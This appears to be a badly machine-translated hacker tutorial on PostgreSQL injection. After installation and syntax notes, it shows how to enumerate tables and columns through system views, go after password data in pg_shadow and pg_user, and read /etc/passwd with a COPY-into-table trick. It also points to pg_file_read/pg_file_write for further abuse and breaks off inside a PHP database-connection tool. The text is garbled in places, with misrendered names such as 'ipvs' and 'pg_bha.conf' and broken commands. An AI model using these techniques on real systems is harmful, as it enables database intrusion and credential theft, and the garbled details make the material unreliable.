Killer www.ydteam.com
This paper could have been born early. I accidentally lost some of the materials I had read from the PostgreSQL learning manual earlier, so I didn't show up for a long time. Today I am free to write a little bit in my memory, I hope it will be helpful for the web of PostgreSQL databases for the hackers, ^_^.
I. Introduction
PostgreSQL is a powerful open-source relational database system. after more than 15 years of development, it has won an excellent reputation in terms of reliability, data integrity, and correctness. it runs on all major operating systems, including Linux, UNIX (AIX, BSD, HP-UX, sgi irix, Mac OS X, Solaris, Tru64) and Windows. it fully complies with ACID principles and fully supports foreign keys, joins, views, triggers, and stored procedures (in multiple languages ). It contains most data types of SQL92 and SQL99, including INTEGER, NUMERIC, BOOLEAN, CHAR, VARCHAR, DATE, INTERVAL, and TIMESTAMP. it also supports storing binary giant objects, including images, sounds, and videos. it has local programming interfaces, C/C ++, Java ,. net, Perl, Python, Ruby, Tcl, and ODBC. postgreSQL is proud of its implementation standards. it implements the ANSI-SQL 92/99 standard. it fully supports subqueries (including sub-selection of FROM clauses), read-committed (read-committed), and serialization transaction isolation level. although PostgreSQL has a fully-relational system catalog (catalog) that supports multiple schemas of each database, its catalog can also be defined by the standard SQL outline Information (Information schema) to access. data Integrity features include (composite) Primary keys, foreign keys for restriction and cascading update/deletion, CHECK constraints, UNIQUE constraints, and non-null constraints. it also has many extensions and advanced features. the column values are automatically added in order, and some result sets can be returned by LIMIT/OFFSET. postgreSQL supports conformity, uniqueness, locality, and function indexes. You can use B-tree, R-tree, hash, or any of the GiST storage methods.
Ii. Installation
1. windows: Download the windows Installation Package on the official website (http://www.postgresql.org), the latest version is 8.3, here you need to pay attention to, when installing PostgreSQL will add a postgres user in the System user, in addition, Postgresql password in windows comes with something similar to a security policy. Setting a password requires a restriction on complexity and length. after the installation, You need to configure the system environment variables .. /PostgreSQL/binning to system environment changes. In this case, you can directly execute psql(mysqlin mysql.exe under windows ).
2. * install on nix: you can download the corresponding installation package or install it online on the official website. The installation process does not show the step of setting the password. The default password is null, when psql is used, you need to switch postgres user logon.
III. Basic syntax
Since the database certainly follows the SQL language, create, insert, update and so on are called PL/PgSQL, but it is not very clear that there are too many syntaxes for a database, let's just talk about the several syntaxes that are useful to Tom.
1. annotation, end mark, Connector
A. Since PostgreSQL follows the SQL language, it certainly supports -- Annotations;
B. PostgreSQL supports/* And/*/annotations, which is similar to Mysql;
C. When using psql for PostgreSQL databases, you need to add the; (semicolon) or g after the command to indicate that the statement has ended to execute the query.
D. PostgreSQL uses | symbols to connect strings. Note that ^ is used. Be careful | escape.
2. Automatic match
PostgreSQL does not automatically match fields like Mysql, which is similar to oracle. Therefore, you must pay attention to the injection and support union queries by default;
3. Connect to PostgreSQL
By default, external connections are not allowed. If you want to remotely manage the PostgreSQL database, you need to modify it .. for the/PostgreSQL/data/pg_bha.conf file, see the PostgreSQL learning manual. postgreSQL uses ipvs by default (similar to mysql root), and the default port is 5432. The default system library is ipvs.
Use psql-h ip-d dataname-p port-U username. Note that the-U parameter is in upper case. If the local machine is installed by default, if you directly use psql-U postgres, you will be prompted to enter the password. After you enter the password correctly, postgres = # will appear (similar to mysql in mysql>), you can use psql normally.
? Instructions on displaying pgsql commands
H. Description of SQL commands displayed
Q: quit.
L all databases in the real system
4. pgAdmin III and phpPgAdmin
A. pgAdmin III is an interface-based database management program provided by PostgreSQL. It can query all fields, functions, sequences, data table structures and related attributes, trigger functions, and views in the PostgreSQL database.
B. phpPgAdmin has the same name as phpMyAdmin of mysql. It is a web-based database management program developed using php. It has powerful functions. Friends who have used phpMyAdmin know that phpMyAdmin is powerful, phpPgAdmin is equally powerful for PostgreSQL databases.
Iv. PostgreSQL Injection
Since PostgreSQL is an RDBMS, the structure of all databases in the system will be stored in the system database, so injection is relatively convenient.
Since the annotation method is the same as that of mysql, how can we determine what database it is? I don't have a standard answer to this. I think I can scan port 5432 (how can the web and database be separated) and use the result returned by the version () function to judge, use the query statement such as select * from pg_class/select * from pg_group to determine the database type. the PostgreSQL directory page contains information_schema, and I have no injection points for the PostgreSQL database.
You cannot use select schema_name from information_schema_schemata to determine whether to use information_schema. Sorry, I only thought about using information_schema. If you have any conditions, verify it.
Describes the intrusion application of PostgreSQL's built-in functions, tables, and views
Current_database () Current Database Name
Session_user session user |
Current_user: username in the current execution environment | () is not required for calling these three functions ()
User is the same as session_user |
Inet_client_port () remote port
Cast (sourcetype AS targettype) defines type conversion
Current_setting () obtains the current value set by setting_name as a query.
Convert () encoding conversion
Pg_stat_user_tables stores views of all system table names. The keyword field is relname. select relname from pg_stat_user_tables limit offset and 1 is used to read table names one by one.
The pg_stat_all_tables and pg_stat_all_tables views have the same functions.
Pg_shadow: Do you think of/etc/shadow when you see shadow? This table contains information about database users, including the keyword username, passwd, and usesuper ), however, this table is configured with permissions.
The structure of the table pg_user is the same as that of pg_shadow, but the table is globally readable. The passwd field may be cleared or encrypted.
Pg_group defines the group and the information of which users belong to the group, and the key field groname
Information_schema.columns all fields are saved in the directory object. The key field is column_name. Use select column_name from information_columns where table_name = tablename limit offset. 1 to read the fields of each table name.
5. Read files
First, create a table, copy the file content to the table, and read the table content.
Create table read (line text );
Copy read from/etc/passwd; alter table read add id serial --
Select * from read;
Drop read;
This is the way of thinking. You can use it yourself (encode, ^ _ ^)
PostgreSQL 8.2 and later have added pg_file_read (text, text, bool) and pg_file_write (text, text, bool). You should know what the name is, let's explore it on your own!
<? Php
If (empty ($ _ GET [action])
{
?>
<Form action = "? Action = connect "method = POST>
<Table>
<Tr> <td> pghost: </td> <input type = "text" name = "pghost" size = "30" value = "127.0.0.1"> </td> </tr>
<Tr> <td> pgport: </td> <input type = "text" name = "pgport" size = "30" value = "5432"> </td> </tr>
<Tr> <td> dbname: </td> <input type = "text" name = "pgdbname" size = "30" value = "s"> </td> </tr>
<Tr> <td> username: </td> <input type = "text" name = "pgusername" size = "30" value = "s"> </td> </tr>
<Tr> <td> password: </td> <input type = "text" name = "pgpassword" size = "30" value = ""> </td> </tr>
<Tr> <td> </td> <input type = "submit" name = "submit" value = "connect"> <input type = "re